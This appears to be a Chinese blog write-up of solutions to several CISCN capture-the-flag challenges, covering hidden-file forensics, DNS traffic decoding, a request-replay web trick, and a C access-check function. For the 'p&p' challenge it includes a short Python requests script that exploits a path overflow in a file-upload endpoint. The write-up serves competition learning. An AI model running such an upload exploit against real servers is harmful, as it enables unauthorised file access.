0%

是不是有点太难的CISCN

  • 神秘文件

    • part1: metadata
    • part2:内嵌到 word 里面
    • part3:没有密钥的 VBA rc4
    • part4:画的 base64
    • part5: ppt 注释
    • part6: 外面有个拼图,拼出来 base64
    • part7: slide4.xml 13轮 base64
    • part8: slidelayout2.xml 去掉特定字符后 base64
    • part9: furry 图片中有 base64
    • part10: 直接维吉尼亚
  • toughdns

    用前面的 01 串的域名能拼成二维码,扫描得字符串

    85 条开始后最后的字节都是一个十六进制提取下来:90方 看,噢

    txt 请求中有两个 id

    • id=4500

      zip,密码是上面的字符串解压得到 pgp 私钥

    • id=6421

      一个奇怪的密文

      根据题上的描述,对十六进制串每个字节高低四位交换,用私钥解密得到flag

  • 火锅

    BP抓包重放0

    直接点击领取NFT获取flag

  • p&p

    这个之前见过类似的,目录溢出

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import requests

    url=

    def func():
    data="11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111static/1"
    requests.get(url+"upload?name="+data)
    requests.get(url+"test")
    res=requests.get(url+"static/1")
    print(res.text)

    if __name__ == "__main__":
    func()
  • 特定用户信息泄露(可能叫这个吧

    这题差点拿下,痛失排名向前进200的机会

    最终怎么寄在了指针上面,卢神全责

    前面的部分凭感觉直接写了,后面的思路对了,但没写对啊嗯

    标准答案是

    1
    2
    3
    int 函数名忘了(char * record_name,char * user_name,char * read_name){
    return !strcmp(user_name,read_name) && !strcmp(record_name,"salary");
    }

    我写成

    1
    2
    3
    4
    int 函数名忘了(char * record_name,char * user_name,char * read_name){
    if(user_name==read_name && record_name=="salary") return 1;
    return 0;
    }

    就不对了(乐